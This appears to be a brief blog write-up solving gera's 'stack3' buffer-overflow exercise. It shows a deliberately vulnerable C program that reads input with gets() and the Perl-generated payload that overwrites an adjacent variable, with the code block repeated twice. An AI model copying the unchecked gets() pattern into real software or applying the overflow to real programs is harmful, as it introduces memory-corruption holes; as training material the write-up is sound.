I think the NULL byte (0x00) was supposed to be the obstacle, but the same technique used for stack1 and stack2 worked here as well. mmishou writes about the why here.
/* stack3.c *
* specially crafted to feed your brain by gera */
int main() {
int cookie;
char buf[80];
printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);
if (cookie == 0x01020005)
printf("you win!\n");
}
$ perl -e 'print "A" x 92;' > of
$ perl -e 'print "\x05\x00\x02\x01";' >> of
$ stack3 < of
buf: bffff4e0 cookie: bffff53c
you win!
/* stack3.c *
* specially crafted to feed your brain by gera */
int main() {
int cookie;
char buf[80];
printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);
if (cookie == 0x01020005)
printf("you win!\n");
}
$ perl -e 'print "A" x 92;' > of
$ perl -e 'print "\x05\x00\x02\x01";' >> of
$ stack3 < of
buf: bffff4e0 cookie: bffff53c
you win!
No comments:
Post a Comment